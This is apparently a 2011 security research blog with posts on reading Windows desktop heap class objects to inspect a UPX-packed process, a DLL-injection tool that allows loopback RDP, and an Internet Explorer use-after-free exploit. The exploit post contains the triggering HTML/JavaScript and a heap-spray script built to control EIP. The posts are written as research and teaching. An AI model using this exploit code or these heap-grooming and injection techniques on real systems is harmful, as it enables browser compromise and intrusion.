PICTUROKU

sábado, 1 de outubro de 2011

Unpack me if you can

Profiting from Desktop heap information

Having followed all the late buzz about the Windows graphics and messaging subsystem kernel part, I decided to take a look at it to understand how it worked, and see if I could find anything interesting and useful. Inspired by Alex Ionescu online presentation, I dove into the realms of the desktop heap, and started to understand the richness of information available. This post is about a little game that shows some of the potential behind that data. The game I'm proposing here will be to run a packed application and, from user mode, try to get some critical information from that process without interfering with it. As passive and non-invasive as possible. Without calling the kernel and not touching the packed process in any way.

Note: As always, the full paper is available here.

For the setting, I grabbed a notepad.exe executable from a XP machine and packed it with UPX.

If you want to know why I didn't use notepad.exe from Windows 7 read my last post: "MUI hell". I renamed notepad.exe to popo.exe as to avoid any confusion with names and I ran it. Running ProcExp afterwards, one can see that the popo.exe process has high entropy, so it is identified as packed images "purple".

Figure 1: Packed process

Next, as I needed another GUI process and I didn't want to lock explorer.exe, I run another notepad.exe. This time I used the one from Windows 7.

As a side note, I'm going to jump around between kernel and user debuggers. Please try to keep in mind that the kernel debugger is just used to validate some of the demonstration data.

Continuing, find a GUI process, :):

!process
0 0 notepad.exe

PROCESS
85cb7d40  SessionId: 1  Cid:
0a14    Peb: 7ffd4000  ParentCid: 0804

    DirBase: 1be3b000  ObjectTable: 998c05d0  HandleCount: 
58.

    Image: notepad.exe

From that process, get a GUI thread.

!process 

PROCESS 85cb7d40  SessionId: 1  Cid: 0a14   
Peb: 7ffd4000  ParentCid: 0804

   
DirBase: 1be3b000  ObjectTable:
998c05d0  HandleCount:  58.

    Image:
notepad.exe

    VadRoot
84444c88 Vads 70 Clone 0 Private 1454.
Modified 1084. Locked 0.

       
THREAD 8458d838  Cid 0a14.0a1c  Teb: 7ffdf000 Win32Thread: ff9ba008 WAIT:
(WrUserRequest) UserMode Non-Alertable

           
84caaec8  SynchronizationEvent

.thread 8458d838  

Implicit thread is now 8458d838

k

  *** Stack
trace for last set context - .thread/.cxr resets it

ChildEBP RetAddr 

96b4eb10 82c9ad75 nt!KiSwapContext+0x26

96b4eb48 82c99bd3 nt!KiSwapThread+0x266

96b4eb70 82c9388f nt!KiCommitThreadWait+0x1df

96b4ebe8 915296d6 nt!KeWaitForSingleObject+0x393

96b4ec44 915294e3 win32k!xxxRealSleepThread+0x1d7

96b4ec60 91526550 win32k!xxxSleepThread+0x2d

96b4ecb8 91529aa2
win32k!xxxRealInternalGetMessage+0x4b2

96b4ed1c 82c7487a win32k!NtUserGetMessage+0x3f

96b4ed1c 779c70c6 nt!KiFastCallEntry+0x12a

000ff998 76d7cde0 ntdll!KiIntSystemCall+0x6

000ff99c 76d7ce13 USER32!NtUserGetMessage+0xc

000ff9b8 0080148a USER32!GetMessageW+0x33

000ff9f8 008016ec notepad!WinMain+0xe6

000ffa88 77473c45 notepad!_initterm_e+0x1a1

000ffa94 779e37f5
kernel32!BaseThreadInitThunk+0xe

000ffad4 779e37c8 ntdll!__RtlUserThreadStart+0x70

000ffaec 00000000 ntdll!_RtlUserThreadStart+0x1b

Ok, now we need to get information from the desktop heap, where it's mapped.

!teb

TEB at 7ffdf000

dt nt!_TEB 7ffdf000 win*

   +0x040
Win32ThreadInfo : 0xff9ba008 Void

   +0x6cc
Win32ClientInfo : [62] 0x20000188

   +0xf6c
WinSockData : (null) 

dt win32k!tagCLIENTINFO 0x7ffdf6cc

+0x000 CI_flags         : 0x20000188

   +0x018 pDeskInfo        : 0x01d00578
tagDESKTOPINFO

   +0x01c ulClientDelta    : 0xfcb00000

   +0x028
CallbackWnd      : _CALLBACKWND

   +0x03c
pClientThreadInfo : 0x01d0fd68 tagCLIENTTHREADINFO

   +0x064
hKL              : 0x08160816 HKL__

   +0x068 CodePage        
: 0x4e4

   +0x06a achDbcsCF        : [2] 
""

   +0x06c msgDbcsCB        : tagMSG

   +0x088 lpdwRegisteredClasses :
0x76dc90d4  -> 0x90

dt win32k!tagDESKTOPINFO 0x01d00578 

   +0x000 pvDesktopBase    : 0xfe800000 Void

   +0x004 pvDesktopLimit   : 0xff400000 Void

   +0x008 spwnd            : 0xfe800618 tagWND

   +0x00c
fsHooks          : 0x4000

   +0x010
aphkStart        : [16] (null) 

   +0x050
spwndShell       : 0xfe8082c0 tagWND

   +0x054
ppiShellProcess  : 0xff9c9608
tagPROCESSINFO

   +0x058
spwndBkGnd       : 0xfe808508 tagWND

   +0x05c
spwndTaskman     : 0xfe804428 tagWND

   +0x060
spwndProgman     : (null) 

   +0x064
pvwplShellHook   : 0xff919638 VWPL

   +0x068
cntMBox          : 0n0

   +0x06c
spwndGestureEngine : (null) 

   +0x070
pvwplMessagePPHandler : (null) 

   +0x074
fComposited      : 0y0

   +0x074
fIsDwmDesktop    : 0y1

!kvas 0xfe800000 

kvas : Show region containing fe800000

### Start   
End        Length (  MB)   
Count Type    

000 fdc00000 ffbfffff  2400000 ( 
36)        8 SessionSpace

!ptelist 0xfe800000 

ptelist : Using fe800000 as VA

VA      
|PDE                                
|PTE                               

FE800000 |Hard Pfn=128E0 Attr=---DA--KWEV     |Hard Pfn=13FE1 Attr=---DA--KWEV

Here, we have the kernel address (0xfe800000) of an executable heap in 32 bits architecture.

According to the help from windbg: "Executable page. For platforms that do not support a hardware execute/noexecute bit, including many x86 systems, the E is always displayed.". Basically where NX is not present - Can anyone out there validate the executability of this heap on 0x64?

A kernel address that we got from user mode and a heap we can iterate and validate, also from user mode.

A heap we can fill with GUI objects. Shellcode anyone? Stack pivoting?

This heap is called the Desktop heap and is shared and mapped read only in the user mode region, between all processes that share the same desktop and session, independently of its integrity level.

!vad 84444c88 

VAD    
level      start      end   
commit

85ccf578 ( 5)         10       1f         0 Mapped       READWRITE          Pagefile-backed section

...

8458f448 ( 1)        800     
82f         4 Mapped  Exe 
EXECUTE_WRITECOPY 
\Windows\System32\notepad.exe

8518bb90 ( 5)        830    
182f        41 Private      READWRITE         

85206270 ( 4)       1830    
18f7         0 Mapped       READONLY           Pagefile-backed section

845ed280 ( 5)       1900    
19de         0 Mapped       READONLY           Pagefile-backed section

84600e10 ( 3)       19e0    
19ef         1 Private      READWRITE         

85935718 ( 5)       19f0    
1aef       128 Private      NO_ACCESS         

85cb43e0 ( 4)       1af0    
1bef       130 Private      NO_ACCESS         

845770c0 ( 2)       1bf0    
1cf0         0 Mapped       READONLY           Pagefile-backed section

85220368 ( 4)       1d00    
28ff         0 Mapped       READONLY           Pagefile-backed section

85e32560 ( 3)       2900    
29ff         2 Private      NO_ACCESS         

Although this alone might get you interested in this portion of memory, I'm not going, in this post, to talk about the potential of using this heap on privilege escalation exploitation cases.

I'm going to focus only on tagCLS type objects and what we can do with the information they provide from a user mode perspective.

The tagCLS objects are created by the win32k module, specifically by the ClassAlloc function, that allocates them in the Desktop heap when called by InternalRegisterClassEx. This USER32 system call is invoked whenever the user32.dll counterpart, RegisterClassEx function, is used to register a window class (tagWNDCLASSEX).

typedef struct tagWNDCLASSEX {

  UINT      cbSize;

  UINT      style;

 
WNDPROC   lpfnWndProc;

  int       cbClsExtra;

  int       cbWndExtra;

  HINSTANCE
hInstance;

 
HICON     hIcon;

 
HCURSOR   hCursor;

 
HBRUSH    hbrBackground;

 
LPCTSTR   lpszMenuName;

 
LPCTSTR   lpszClassName;

 
HICON     hIconSm;

} WNDCLASSEX, *PWNDCLASSEX; 

Let's see what the Desktop heap has for us, from user mode. To calculate its address we grab the pDeskInfo member from the TEB's Win32ClientInfo offset, and subtract the size of heap metadata (0x570). Having the heap's base address we can dump it now:

dt nt!_heap 0x01d00000

   +0x000
Entry            : _HEAP_ENTRY

   +0x008 SegmentSignature : 0xffeeffee

   +0x00c
SegmentFlags     : 1

   +0x010
SegmentListEntry : _LIST_ENTRY [ 0xfe8000a8 - 0xfe8000a8 ]

   +0x018
Heap             : 0xfe800000 _HEAP

   +0x01c
BaseAddress      : 0xfe800000 Void

   +0x020
NumberOfPages    : 0xc00

   +0x024
FirstEntry       : 0xfe800570 _HEAP_ENTRY

   +0x028
LastValidEntry   : 0xff400000 _HEAP_ENTRY

   +0x02c
NumberOfUnCommittedPages : 0xbaa

   +0x030
NumberOfUnCommittedRanges : 1

   +0x034
SegmentAllocatorBackTraceIndex : 0

   +0x036
Reserved         : 0

   +0x038
UCRSegmentList   : _LIST_ENTRY [
0xfe855ff0 - 0xfe855ff0 ]

   +0x064
Signature        : 0xeeffeeff

   +0x0a0
VirtualAllocdBlocks : _LIST_ENTRY [ 0xfe8000a0 - 0xfe8000a0 ]

   +0x0a8
SegmentList      : _LIST_ENTRY [ 0xfe800010
- 0xfe800010 ]

   +0x0b8
BlocksIndex      : 0xfe800138 Void

   +0x0c4
FreeLists        : _LIST_ENTRY [
0xfe81ef70 - 0xfe8489b8 ]

   +0x0d0
CommitRoutine    : 0x91497343     long 
win32k!UserCommitDesktopMemory+0

   +0x0d4
FrontEndHeap     : (null) 

   +0x0d8
FrontHeapLockCount : 0

   +0x0da
FrontEndHeapType : 0 ''

   +0x0dc
Counters         : _HEAP_COUNTERS

   +0x130
TuningParameters : _HEAP_TUNING_PARAMETERS

All this information pertains to kernel mode, but we can easily determine an offset from the kernel mode values to user mode:

?0xfe800000-0x01d00000

Evaluate
expression: -55574528 = fcb00000

As we know that the first chunk of memory for a heap allocation is a HEAP_ENTRY, notice that the tagDESKTOPINFO is the first entry of the heap:

?0xfe800570+@@(sizeof(nt!_heap_entry))

Evaluate expression: -25164424 = fe800578

?(fe800578&0000ffff)+01d00000 

Evaluate expression: 30410104 = 01d00578

Knowing the offset between kernel mode and user mode mappings of the Desktop heap, we can adjust the kernel addresses found and rebase them to user mode addresses. Doing so allows us to iterate through the whole heap, chunk by chunk.

dt nt!_HEAP_ENTRY 01d00570

   +0x000
Size             : 0x10

?01d00570+0x10*8

Evaluate expression: 30410224 = 01d005f0

dt nt!_HEAP_ENTRY 01d005f0

   +0x000
Size             : 4

?01d005f0+0x4*8

Evaluate expression: 30410256 = 01d00610

dt nt!_HEAP_ENTRY 01d00610

   +0x000
Size             : 0x17

Etc. But I said we're going to hunt for tagCLS objects. Let's have a look at them. The size of a tagCLS structure is:

?@@(sizeof(win32k!tagCLS)+sizeof(nt!_heap_entry))

Evaluate expression: 100 = 00000064

But as 64 isn't a multiple of eight we need to round it up, giving:

?68/8

Evaluate expression: 13 = 0000000d

So we need to seek for heap entries of size 0xd.

Recapitulating, the first heap chunk is a tagDESKTOPINFO.

?@@(sizeof(win32k!tagDESKTOPINFO))

Evaluate expression: 120 = 00000078

?01d00578+0x78

Evaluate expression: 30410224 = 01d005f0

So, our first seekable element is at 01d005f0, which is validated by our previous manual heap walking.

Although I could loop through all the heap entries, like before, I just need to find a first valid tagCLS to validate data. Let's then search for hints on objects sized 0xd then:

s -w 01d005f0 l1000 d

01d006c8  000d 0001 0017 0c00 06d0 ff68 8001 8001  ..........h.....

01d00734  000d 0900 3323 3732 3936 fe00 0018 0001  ....#32769......

01d00800  000d 0001 0018 0c00 0808 ff68 c039 c039  ..........h.9.9.

dt nt!_HEAP_ENTRY 01d006c8  

   +0x000
Size             : 0xd

   +0x002
Flags            : 0x1 ''

   +0x003
SmallTagIndex    : 0 ''

   +0x000
SubSegmentCode   : 0x0001000d Void

   +0x004
PreviousSize     : 0x17

This seems a valid entry. Let's dump it as tagCLS:

dt win32k!tagCLS 01d006c8+8  

   +0x000
pclsNext         : 0xff6806d0 tagCLS

   +0x004
atomClassName    : 0x8001

   +0x006
atomNVClassName  : 0x8001

   +0x008
fnid             : 0x29d

   +0x00c
rpdeskParent     : 0x8585d678 tagDESKTOP

   +0x010
pdce             : (null) 

   +0x014
hTaskWow         : 0

   +0x016 CSF_flags       
: 0x41

   +0x018 lpszClientAnsiMenuName : (null) 

   +0x01c lpszClientUnicodeMenuName
: (null) 

   +0x020
spcpdFirst       : (null) 

   +0x024
pclsBase         : 0xffb22758 tagCLS

   +0x028
pclsClone        : (null) 

   +0x02c
cWndReferenceCount : 0n1

   +0x030
style            : 8

   +0x034
lpfnWndProc      : 0x914fcd91     long 
win32k!xxxDesktopWndProc+0

   +0x038 cbclsExtra      
: 0n0

   +0x03c cbwndExtra       : 0n0

   +0x040 hModule          : 0x91460000 Void

   +0x044
spicn            : (null) 

   +0x048
spcur            : 0xffb75608 tagCURSOR

   +0x04c
hbrBackground    : 0x00000002 HBRUSH__

   +0x050
lpszMenuName     : (null) 

   +0x054
lpszAnsiClassName : 0xfe800738 
"#32769"

   +0x058
spicnSm          : (null) 

This is what we need. Let's get the tagDESKTOP address and validate it. This time we’ll be using the kernel to verify its address, by grabbing Win32ThreadInfo member from the TEB.

dt win32k!tagTHREADINFO 0xff9ba008
rpdesk

   +0x0c8
rpdesk : 0x8585d678 tagDESKTOP

Yes, it is the same. Now, if we search for all occurrences of this tagDESKTOP address in the Desktop heap, subtract 0xc from the obtained address, we get a list of all tagCLS objects in the heap.

Note that if I were to do a program or script to do this, I'd register a tagWNDCLASSEX with a known lpfnWndProc like 0xbadecafe, seek for this value to locate my tagCLS object and get my corresponding tagDESKTOP; then, iterate all the heap items grabbing those with the same desktop. But, as I'm using the debugger for the demo, it's easier and simpler to do it this way.

s -d 01d005f0 l1000000
0x8585d678 

01d00624  8585d678 fe800618 00040000 82000100  x...............

01d006dc 
8585d678 00000000 00410000 00000000 
x.........A.....

01d00754 
8585d678 fe800748 00040000 80000100 
x...H...........

01d00814 
8585d678 00000000 00410000 00000000 
x.........A.....

01d0088c  8585d678 fe800880 00040000 80000100  x...............

01d0096c  8585d678 00000000 03410000 00000000  x.........A.....

01d009e4  8585d678 fe8009d8 00000000 00000000  x...............

01d00a2c  8585d678 fe800a20 00000000 00000000  x... ...........

01d00a54 
8585d678 00000000 00410000 00000000 
x.........A........

The most interesting parts of a tagCLS are lpfnWndProc and hModule because these are user mode addresses that we can use and validate from user mode.

.foreach (meuval {s -[1]d 01d005f0 l1000000 0x8585d678 }
)  {

   .if
((poi(${meuval}-0x14)&0x0000ffff) >= 0000000d) {

     
.printf "ObjAddr=[%08x], hInstance[%08x], WndProc=",

              
poi(${meuval}+18),

              
poi(${meuval}+34);

       dds
(${meuval}+28) l1;

}

}

Note: The search size given in the command above is greater or equal to the size of tagCLS, because the kernel can reserve some extra space if requested by the user, as indicated in the cbclsExtra class member.

...

ObjAddr=[fe800ac0],
hInstance[00800000], WndProc=01d00af4 
008072c5 notepad!NpSaveDialogHookProc+0x97

ObjAddr=[fe800b58], hInstance[76d60000],
WndProc=01d00b8c  76d70666
USER32!ImeWndProcW

ObjAddr=[fe800dd0], hInstance[77090000],
WndProc=01d00e04  770941b5
MSCTF!UIWndProc

ObjAddr=[fe800e38], hInstance[77090000],
WndProc=01d00e6c  770fdd77 MSCTF!UIComposition::CompWndProc

...

...

ObjAddr=[fe805228], hInstance[749f0000],
WndProc=01d0525c  74a1fe38
COMCTL32!CListView::s_WndProc

ObjAddr=[fe805490], hInstance[749f0000],
WndProc=01d054c4  74a16022
COMCTL32!Header_WndProc

...

ObjAddr=[fe807320], hInstance[01000000],
WndProc=01d07354  01003429

...

ObjAddr=[fe814950], hInstance[70830000],
WndProc=01d14984  708432bc

ObjAddr=[fe814ba8], hInstance[70830000],
WndProc=01d14bdc  708431dc

ObjAddr=[fe814c40], hInstance[70830000],
WndProc=01d14c74  70842954

...

ObjAddr=[fe82b580], hInstance[77820000],
WndProc=01d2b5b4  778663e5
ole32!OleMainThreadWndProc

ObjAddr=[fe82cb70],
hInstance[00800000], WndProc=01d2cba4 
008014de notepad!NPWndProc

...

ObjAddr=[fe842790], hInstance[77090000],
WndProc=01d427c4  770fdd77 MSCTF!UIComposition::CompWndProc

ObjAddr=[fe8428a8], hInstance[76d60000],
WndProc=01d428dc  76db3f06
USER32!EditWndProcW

ObjAddr=[fe842910], hInstance[749f0000],
WndProc=01d42944  749f99d0
COMCTL32!Edit_WndProc

ObjAddr=[fe842ac8], hInstance[749f0000], WndProc=01d42afc  74a90d49 COMCTL32!StatusWndProc

ObjAddr=[fe843c78], hInstance[01010000],
WndProc=01d43cac  01044270

Dumping lpfnWndProc and hModule from all the tagCLS objects found in the desktop heap, we can observe that all the user windows message dispatch handlers registered in the system for the current desktop are available for analysis from user mode. From the dump above I've identified two from notepad: NpSaveDialogHookProc and NPWndProc which is the main window dispatcher function; and module 0x01000000. This entire post is about module 0x01000000.

Module 0x01000000 is popo.exe as can be seen from the procExp.

Figure 2: Packed popo.exe module address.

And the address from WndProc at memory position 0x1d07354, 0x01003429 is the NPWndProc windows message handler dispatcher function from popo.exe as seen in the figure. The figure shows the unpacked version of popo.exe so that symbol resolution is available.

Figure 3: Window dispatcher registration.

Figure 4: Window dispatcher registration arguments.

So here you have it. A fine simple non-invasive way of getting some information from packed or protected applications.

Other thoughts: Do you think that the same info is available for Protected (Media Path) processes? Those to which we were not supposed to get any info about?

Is there any information available for other desktops windows if in the same session? Can we link this data in any way with the aheList?

Hope you enjoyed it.

quinta-feira, 22 de setembro de 2011

MUI hell

How hateful can (some times) Microsoft Windows be? Let me count the times.... Well, this one happened while I was doing some experiments with Notepad.exe. As I needed to modify the Notepad.exe binary and didn't want to mess with the installation, I copied it to a temporary folder. Changed the binary afterwards and tried to run it.
Hmmm... Nothing happened. Run it again, and again, and again.... Nothing was happening. So, I recopied it again, and tried to run it to see if the failure was caused by the patching. Nope. Again, nothing was happening. Run it again, and again, and again.... Nothing.

I decided to run Procmon on it, and surprise, surprise, a couple of things failed to be found, namely: the MUI files.

Copying the missing files from Windows "en" and "en-US" subdirectories to the temp dir, and maintaining the
directories structures, notepad finally executed.

Doing the same with Calc.exe, guess what?

Who's responsible for this? A stupid function exported from ntdll called LdrpLoadResourceFromAlternativeModule.
This function get called when Notepad.exe and Calc.exe tries to load resource strings from the binary.

Oh, and this seems to break UPX....

What the hell?

terça-feira, 20 de setembro de 2011

Inside Job (or give me a loop)

Let's pretend I'm a System Administrator (:)), and I've got to tweak some features and install some software in my client PC's and servers for end users and programmers usage.
I'm logged in as Administrator, so, some of the policies and configurations I'm pushing don't apply to my account.
I need to login as a test user with membership similar to my clients to verify if everything is working and in place. At the same time I'd like to keep my admin session open, so I can make some adjustments to the configuration.
If I'm logged into a workstation console and I try to open a different session as another user, I'm obliged to use the 'Fast user switching' service. But this locks my previous admin session. While still logged in into the computer's console, if I try to open an RDP connection to the machine, I get an error reporting that I'm already connected to the console of the local computer.

But, all this is possible as long as I use remote sessions from a Windows server product. This is to say that you can loopback thru RDP in Windows Server, meaning that something is diferent in its RDP implementation. Could it be that the client is different from the one in the Workstation product? I can't even see the remote console connection.

What is the logic of this? In Windows Professional Edition, this happens because of a Microsoft policy that allows only one console session at a time. But, as the server edition has a admin remote console mode shouldn't the same concept be applied to the workstation edition? Why can't I open a new RDP session thru local host, or loopback interface, while logged in the console?

I don't know.

Trying to understant the reasoning behind this limitation, I determined that the loopback blockage resides in the client and not in the server.
The key lies in a COM object provided by mstscax.dll.
I developed a PoC tool that demonstrates just this. The tool is a dll called gimmelooprdp.dll, available here, that you can inject into a mstsc.exe RDP client. Run the mstsc.exe, get it's PID, and use a dll injection tool to inject it to mstsc.exe process.

Afterwards you can proceed as usual. Set the machine local address in the Computer data field and press Connect. The tool only works in Windows XP sp2 (as Microsoft no longer offers support for it, I hope they don't get anoyed by this hack). So, you'll be able to establish the connection, but, as Windows XP Pro only allows one session at a time, your primary console session will be logged off. If you wish to proceed with two opened sessions in the Professional edition, it is indeed possible, but you'll have to 'explode' the sessions (see my previous post 'Exploding sessions').

The dll can be downloaded here.

quinta-feira, 1 de setembro de 2011

Diaries of vulnerability - take 2

Stage 1 exploit - Controlling EIP

A friend of mine referred that he wasn't able to run the original exploit published by d0c_s4vage on his machine. Another one pointed out that he didn't understand why the original exploit used a block size of 0xE0 for heap spraying, even though the object used-after-free was a CTreeNode sized 0x4C. I thought this was a good motivation for a post, so here it is.

Note: I'll make this post simpler than the first part, so I'll skip some explanations along the way and I'll leave the first point for another post as its analysis has some background checking that will be covered in the second point explanation and in this post.

Note 2: Again the pretty formatted paper is available here for download.

Let’s begin with a slight variation of the exploit, as so we can test it more conveniently:

<html>
   <body>
     <script language='javascript'>
       document.body.innerHTML += "<object align='right' width='1000'>TAG_1</object>";
       document.body.innerHTML += "<a style='float:left;'>TAG_3</a>A";
       document.body.innerHTML += "A";
       document.body.innerHTML += "<strong id='popo' style='font-size:1000pc; margin:auto -1000cm auto auto;' dir='ltr'></strong>";
   document.getElementById('popo').innerHTML = "Z";
    </script>
</body>
</html>

And these breakpoints:

bp mshtml!CTreeNode::CTreeNode ".printf \" CTreeNode:node[%08x] Type:\",ecx;dds edi l1; gc;"
bp mshtml!CObjectElement::CObjectElement ".printf \" CObjectElement:addr[%08x] \\n\",esi;gc"

Let's review some history:

CObjectElement:addr[004150e8]

CTreeNode:node[0042adb0] Type:mshtml!CObjectElement::`vftable'

CTreeNode:node[0042b1d0] Type:mshtml!CAnchorElement::`vftable'

CTreeNode:node[0042b280] Type:mshtml!CPhraseElement::`vftable'

CTreeNode:node[0042adb0] Type:mshtml!CObjectElement::`vftable'

CTreeNode:node[0042b1d0] Type:mshtml!CAnchorElement::`vftable'

...

CTreeNode:node[0042ae60] Type:mshtml!CBodyElement::`vftable'
(b60.2e0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0042adb0 ecx=0041010a edx=00000000 esi=01ffbc20 edi=00000000
eip=6987b68f esp=01ffbbf4 ebp=01ffbc0c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
mshtml!CElement::Doc+0x2:
6987b68f 8b5070 mov edx,dword ptr [eax+70h] ds:0023:00000070=????????

ub mshtml!CElement::Doc:
6987b68d 8b01 mov eax,dword ptr [ecx]

dc ebx
0042adb0 0041010a 00000000 ffff404a ffffffff ..A.....J@......

What we have here is, as we saw in the previous post, that EBX is a pointer to the CTreeNode freed object, and is being wrongly reused. So, why don’t we reuse the CTreeNode freed object and fill it with our controlled content? If ECX is the first value of the CTreeNode we could adjust its value so we could jump directly to our nop sled address. The problem is that between the free of the CTreeNode and its usage we have no chance of intervening in the execution path (by use of javascript). So we need to deal with the address left by the heap allocator. If ECX is the first value of the CTreeNode, according to reversed code it should be pointing to a CObjectElement but the value pointed by ECX has apparently no valid or known object address:

!heap -x 0041010a

Entry     User      Heap      Segment       Size  PrevSize  Unused    Flags

-----------------------------------------------------
00410050  00410058  00370000  00410450       100      -    0  LFH;free  

The reason for this is because EBX was freed. What happens when a user memory chunk is returned to the heap allocator (the LFH in this case), besides all the heap related metadata updated, is that the first WORD in the user portion of the allocation, gets a new purpose, it becomes the FreeEntryOffset:

*(WORD)(ChunkHeader + 8) = AggrExchg.FreeEntryOffset;

This explains the 0x010a, but what is the 0x0041? This value is the two MSB of the original value because the free process doesn’t update this WORD, so we know that the CObjectElement had a value of 0x0041xxxx, which corresponds to our freed CObjectElement in the trace: 0x004150e8.

LFH, as it tries to keep fragmentation to a minimum, uses a metadata structure called heap sub-segment, which organizes memory in contiguous chunks that keep track of allocated and freed memory blocks of the same size.

So a sub-segment is used to manage blocks of size 0x4C and another sub-segment manages the allocation and de-allocation of blocks of size 0xE0, explaining why two aligned in time allocations, CObjectElement:addr[004150e8] and CTreeNode:node[0042adb0] have so different addresses.

This simplistic view of the process is important to understand it, because it will allow us to influence the process, and more important, the values that we want stored in this first DWORD of the user buffer. I say first DWORD because we want to predictably set this to a usable or controllable pointer address.

How can we influence this, then?

As the first WORD is a FreeEntryOffset, and it's updated during a free of a CTreeNode we'll need to impose some determinism on CTreeNode allocations. How do we do this? We allocate sufficient objects of this size to fill potential holes in the sub-segment that manages 0x4C sized objects and at some point we'll start having contiguous objects allocation. The following code will do the trick:

...
document.body.innerHTML += "<strong id='popo' style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'></strong>";
var size = 0x4c;
var arrSize = 200;
var obj_overwrite = unescape("%u0c0c%u0c0c");
while(obj_overwrite.length < size)
{ obj_overwrite += obj_overwrite; }
obj_overwrite = obj_overwrite.substr(0, (size-6)/2);
CollectGarbage();
var arr = new Array();
for(var counter = 0; counter < arrSize; counter++)
{ arr.push(obj_overwrite.substr(0, obj_overwrite.length)); }
for(var counter = arrSize-50; counter < arrSize; counter+=3)
{ delete arr[counter]; }
CollectGarbage();
document.getElementById('popo').innerHTML = "Z";
...

After crashing we get this:

dc ebx ebx+0x4C

002d6318  002e00a7 00000000 ffff404a ffffffff  ........J@......

002d6328  00000051 00000000 00000000 00000000  Q...............

002d6338  00000000 002d6340 00000062 00000000  ....@c-.b.......

002d6348  00000000 00000000 002d6328 00000000  ........(c-.....

002d6358  00000000 00000000 00000000 00000000  ................   

dc ebx-8-0x4C ebx+0x4C+8+0x4C

002d62c4  0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c  ................

002d62d4  0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c  ................

002d62e4  0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c  ................

002d62f4  0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c  ................

002d6304  0c0c0c0c 00000c0c 00000000 3b93022c  ............,..;

002d6314  80000000 002e00a7 00000000 ffff404a  ............J@..

002d6324  ffffffff 00000051 00000000 00000000  ....Q...........

002d6334  00000000 00000000 002d6340 00000062  ........@c-.b...

002d6344  00000000 00000000 00000000 002d6328  ............(c-.

002d6354  00000000 00000000 00000000 00000000  ................

002d6364  00000000 3b930223 88000000 00000046  ....#..;....F...

002d6374  0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c  ................

002d6384  0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c  ................

002d6394  0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c  ................

002d63a4  0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c  ................

002d63b4  0c0c0c0c 00000c0c                    ........

As you can see, the before and after chunk´s content are controllable by us, filling those objects sized 0x4C with 0x0c0c0c0c. This gives us predictability where our chunk is allocated (relative offset) and the offset value that is written. But a problem remains, that will render useless our effort into controlling the first WORD of the pointer.

(6c0.4cc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=7fd6d1eb ebx=0036a530 ecx=003800a7 edx=00000000 esi=0228bd10 edi=00000000
eip=6987b68f esp=0228bce4 ebp=0228bcfc iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
mshtml!CElement::Doc+0x2:
6987b68f 8b5070 mov edx,dword ptr [eax+70h] ds:0023:7fd6d25b=????????

dc ebx l1
0036a530 003800a7

!heap -x ebx
Entry User Heap Segment Size PrevSize Unused Flags
-------------------------------------------------------
0036a528 0036a530 002b0000 00347878 58 - 0 LFH;free

dt nt!_HEAP_SUBSEGMENT 00347878
ntdll!_HEAP_SUBSEGMENT
+0x000 LocalInfo : 0x002b6f70 _HEAP_LOCAL_SEGMENT_INFO
+0x004 UserBlocks : 0x00369f40 _HEAP_USERDATA_HEADER
+0x008 AggregateExchg : _INTERLOCK_SEQ
+0x010 BlockSize : 0xb
...

dt nt!_HEAP_BUCKET_COUNTERS 0x002b6f70+50
ntdll!_HEAP_BUCKET_COUNTERS
+0x000 TotalBlocks : 0x12b
+0x004 SubSegmentCounts : 7
+0x000 Aggregate64 : 0n30064771371

TotalBlocks only reports 0x12b blocks, this means that we won’t have any offset recorded in the first WORD of the pointer beyond this value. Why? Because it is the sum of all chunks distributed by all 7 sub-segments (as indicated by SubSegmentCounts). Although we could push this value even upper, that would lead to an increase of heap allocations. So let’s say that the only thing we can predict from this is that it´s value will always be a multiple of 0xb (0x58/8) plus 2. We could also force the chunk to the end of the list of an heap sub-segment cache, setting the WORD value to 0xffff, but that would gain us nothing either, more on this later.

dt -a nt!_HEAP_SUBSEGMENT 0x002b6f70+8
ntdll!_HEAP_SUBSEGMENT
[0] @ 002b6f78
---------------------------------------------
+0x000 LocalInfo : 0x03c3e1c0 _HEAP_LOCAL_SEGMENT_INFO
+0x004 UserBlocks : 0x03c3e1a0 _HEAP_USERDATA_HEADER
...
[1] @ 002b6f98
---------------------------------------------
+0x000 LocalInfo : 0x00347878 _HEAP_LOCAL_SEGMENT_INFO
+0x004 UserBlocks : 0x002bdaf0 _HEAP_USERDATA_HEADER
...

Considering this, from this point on, I’ll diverge in the exploit code from the original one, because I want to improve the exploit by giving it more resilience, so keep reading.

We know now that the value we're targeting in lies within the heap segment that manages chunks of size 0xE8 (where CObjectElement resides) and we can't control the last 4 bytes of the address. Or can we?

All that seems left for predictability at this point is to try to fill a heap sub-segment with strings sized 0xE8, and set the CObjectElement right in the middle or end of this string sprayed memory area, so that we can profit from its first WORD address. We need that the last CObjectElement created lands in a filled sub-segment and not in a new sub-segment, where there won't be any string content. So, being 0xffff the maximum block amount of a sub-segment, we can have, per sub-segment, a total of 2259 chunks of 0xe8 size.

?ffff*8/e8
Evaluate expression: 2259 = 000008d3

Say we allocate 2259 string objects of size 0xE8, the first WORD of the CTreeNode freed object will have a value between 0x2 and 0xffff; we might land our pointer anywhere between the full address range of the segment:

0xXXXX[0x2-0xffff]

But, if we force the usage of a caching sub-segment, the address range is heavily reduced, although we can’t preview what we’ll get as first WORD. Forcing the cache usage is as simple as allocating a large number of strings chunks sized 0xE8, and freeing a small number of the lastly allocated strings; the strings will fill up the cache and will be reused by the time the CObjectElement is created.

But what happens if, by any chance, we land in a point in time where the caches are empty? It will allocate the object from an active segment, and we’re back to the starting point, as can be seen from the following example trace:

CObjectElement:addr[028a4f80]
CTreeNode:node[00450080] Type:028a4f80 CObjectElement::`vftable'
